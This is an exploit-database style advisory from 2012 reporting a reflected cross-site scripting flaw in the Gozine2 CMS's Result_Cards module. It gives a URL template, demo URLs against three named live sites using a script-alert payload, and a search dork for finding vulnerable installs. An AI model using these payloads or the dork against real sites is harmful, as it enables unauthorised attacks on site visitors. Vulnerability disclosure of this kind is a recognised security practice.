Gozine2 <= Cross Site Scripting Vulnerabilities

2012-09-23 13:50:20
Posted by: Net.W0lf

################################################################
----------------------------------------------------------------
Gozine2 <= Cross Site Scripting Vulnerabilities
----------------------------------------------------------------
################################################################
# Exploit Title : Gozine2 <= Cross Site Scripting VulnerabilitieS
# Author : Hack Center Security Team
# Discovered By : Net.W0lf
# Software Link : [ www.gozine2.ir ]
# Impact : [ High ]
# My site : Net-W0lf.blogspot.com
# E-Mail : [email protected] & [email protected]
# Dork : "?????? ???? ? ???????? ???? ???? ???? ????? ??"
################################################################
----------------------------------------------------------------
+-----------------------+
| Cross Site scripting |
+-----------------------+

3xpl0!T :

[TaRgeT]/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=[xss]


Dem0:

www.gozine2.ir/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=<script>alert(/0/)</script>
www.gozineyejavan.ir/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=<script>alert(/0/)</script>
www.gozine2.co/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=<script>alert(/0/)</script>


GreetZ To :

| Am!r | B3HZ4D | PacketStormSecurity.org | Exploit-db.Com |
| And All Iranian Black Hat HackerZ |
Persian Gulf 4 Ever
===========================================# End #=============================================

Fixes

No fixes

In order to submit a new fix you need to be registered.